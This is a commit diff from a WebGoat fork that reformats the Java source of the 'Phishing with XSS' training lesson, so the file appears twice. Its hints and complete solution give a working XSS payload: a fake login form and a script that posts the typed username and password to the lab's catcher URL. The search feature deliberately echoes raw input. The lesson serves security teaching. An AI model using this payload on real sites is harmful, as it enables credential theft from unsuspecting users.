dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Replaced the tabs with spaces so we do not mess up the formatting, used the expand command from linux

Browse Source
This commit is contained in:
nbaars
2014-09-15 16:40:51 +02:00
parent 9bb1cb8d9c
commit 3ae898784f
118 changed files with 21208 additions and 21214 deletions
Download Patch File Download Diff File Expand all files Collapse all files

432
src/main/java/org/owasp/webgoat/lessons/Phishing.java
View File

@ -54,244 +54,244 @@ import org.owasp.webgoat.session.WebSession;
public class Phishing extends LessonAdapter
{
/**
* Description of the Field
*/
protected final static String SEARCH = "Username";
private String searchText;
/**
* Description of the Field
*/
protected final static String SEARCH = "Username";
private String searchText;
/**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
private boolean postedCredentials(WebSession s)
{
String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY,
Catcher.EMPTY_STRING);
/**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
private boolean postedCredentials(WebSession s)
{
String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY,
Catcher.EMPTY_STRING);
// <START_OMIT_SOURCE>
return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
// <END_OMIT_SOURCE>
}
// <START_OMIT_SOURCE>
return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
// <END_OMIT_SOURCE>
}
/**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
/**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{
searchText = s.getParser().getRawParameter(SEARCH, "");
// <START_OMIT_SOURCE>
// <END_OMIT_SOURCE>
try
{
searchText = s.getParser().getRawParameter(SEARCH, "");
// <START_OMIT_SOURCE>
// <END_OMIT_SOURCE>
ec.addElement(makeSearch(s));
if (postedCredentials(s))
{
makeSuccess(s);
}
} catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
}
ec.addElement(makeSearch(s));
if (postedCredentials(s))
{
makeSuccess(s);
}
} catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
}
return (ec);
}
return (ec);
}
protected Element makeSearch(WebSession s)
{
ElementContainer ec = new ElementContainer();
protected Element makeSearch(WebSession s)
{
ElementContainer ec = new ElementContainer();
ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
if (s.isColor())
{
t.setBorder(1);
}
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
if (s.isColor())
{
t.setBorder(1);
}
tr = new TR();
tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
.setAlign("center"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
.setAlign("center"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
TR row1 = new TR();
row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
TR row1 = new TR();
row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
Input input1 = new Input(Input.TEXT, SEARCH, searchText);
row1.addElement(new TD(input1).setAlign("left"));
t.addElement(row1);
Input input1 = new Input(Input.TEXT, SEARCH, searchText);
row1.addElement(new TD(input1).setAlign("left"));
t.addElement(row1);
Element b = ECSFactory.makeButton("Search");
t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
ec.addElement(t);
Element b = ECSFactory.makeButton("Search");
t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
ec.addElement(t);
if (!searchText.equals(""))
{
ec.addElement(new BR());
ec.addElement(new HR());
ec.addElement(new BR());
ec.addElement(new StringElement("Results for: " + searchText));
ec.addElement(new Comment("Search results"));
ec.addElement(new BR());
ec.addElement(new BR());
ec.addElement(new B(new StringElement("No results were found.")));
ec.addElement(new Comment("End of Search results"));
}
if (!searchText.equals(""))
{
ec.addElement(new BR());
ec.addElement(new HR());
ec.addElement(new BR());
ec.addElement(new StringElement("Results for: " + searchText));
ec.addElement(new Comment("Search results"));
ec.addElement(new BR());
ec.addElement(new BR());
ec.addElement(new B(new StringElement("No results were found.")));
ec.addElement(new Comment("End of Search results"));
}
return (ec);
}
return (ec);
}
/**
* Gets the hints attribute of the CluesScreen object
*
* @return The hints value
*/
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+ "Try to make the form look official.");
hints
.add("Try: <BR> "
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Add functionality that can post a request, a button might work<BR><BR>"
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+ "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints
.add("Try: <BR> "
+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot;&gt;"
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Make the button perform an action on submit, <BR>"
+ "adding an onclick=\"hack()\" might work<BR>"
+ "Don't forget to add the hack() javascript function"
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;<BR>"
+ "Also, check firebug. Does the search form need to be terminated for this to work...? (&lt;/form&gt;)");
hints
.add("You need to create the hack() function. This function will pull the credentials from the "
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+ "<BR> Some useful code snippets:<UL>"
+ "<LI>doucument.phish.user.value - will access the user field"
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+ "<BR><BR>The entire javascript portion:<BR><BR>"
+ "&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;");
hints
.add("Complete solution for this lesson:<BR><BR>"
+ "&lt;/form&gt;&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials
* were just stolen.\nUser Name = " + document.phish.user.value + "\nPassword = " +
* document.phish.pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
* +document.phish.user.value + "&password=" + document.phish.pass.value +
* "";}</script><form name="phish"><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2> <br>
* <br>
* Enter Username:<br>
* <input type="text" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
* <br>
* <HR>
* <!--
*
*/
return hints;
}
/**
* Gets the hints attribute of the CluesScreen object
*
* @return The hints value
*/
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+ "Try to make the form look official.");
hints
.add("Try: <BR> "
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Add functionality that can post a request, a button might work<BR><BR>"
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+ "http://localhost/webgoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints
.add("Try: <BR> "
+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot;&gt;"
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Make the button perform an action on submit, <BR>"
+ "adding an onclick=\"hack()\" might work<BR>"
+ "Don't forget to add the hack() javascript function"
+ "<BR><BR>In the whole script:<BR><BR>"
+ "&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;<BR>"
+ "Also, check firebug. Does the search form need to be terminated for this to work...? (&lt;/form&gt;)");
hints
.add("You need to create the hack() function. This function will pull the credentials from the "
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+ "<BR> Some useful code snippets:<UL>"
+ "<LI>doucument.phish.user.value - will access the user field"
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+ "<BR><BR>The entire javascript portion:<BR><BR>"
+ "&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;");
hints
.add("Complete solution for this lesson:<BR><BR>"
+ "&lt;/form&gt;&lt;script&gt;function hack(){ "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;"
+ "alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; + document.phish.pass.value);} "
+ "&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials
* were just stolen.\nUser Name = " + document.phish.user.value + "\nPassword = " +
* document.phish.pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
* +document.phish.user.value + "&password=" + document.phish.pass.value +
* "";}</script><form name="phish"><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2> <br>
* <br>
* Enter Username:<br>
* <input type="text" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
* <br>
* <HR>
* <!--
*
*/
return hints;
}
/**
* Gets the instructions attribute of the XssSearch object
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>"
+ "Below is an example of a standard search feature.<br>"
+ "Using XSS and HTML insertion, your goal is to: <UL>"
+ "<LI>Insert html to that requests credentials"
+ "<LI>Add javascript to actually collect the credentials"
+ "<LI>Post the credentials to http://localhost/webgoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
/**
* Gets the instructions attribute of the XssSearch object
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>"
+ "Below is an example of a standard search feature.<br>"
+ "Using XSS and HTML insertion, your goal is to: <UL>"
+ "<LI>Insert html to that requests credentials"
+ "<LI>Add javascript to actually collect the credentials"
+ "<LI>Post the credentials to http://localhost/webgoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions);
}
return (instructions);
}
private final static Integer DEFAULT_RANKING = new Integer(30);
private final static Integer DEFAULT_RANKING = new Integer(30);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the category attribute of the FailOpenAuthentication object
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.XSS;
}
/**
* Gets the category attribute of the FailOpenAuthentication object
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.XSS;
}
/**
* Gets the title attribute of the CluesScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Phishing with XSS");
}
/**
* Gets the title attribute of the CluesScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Phishing with XSS");
}
}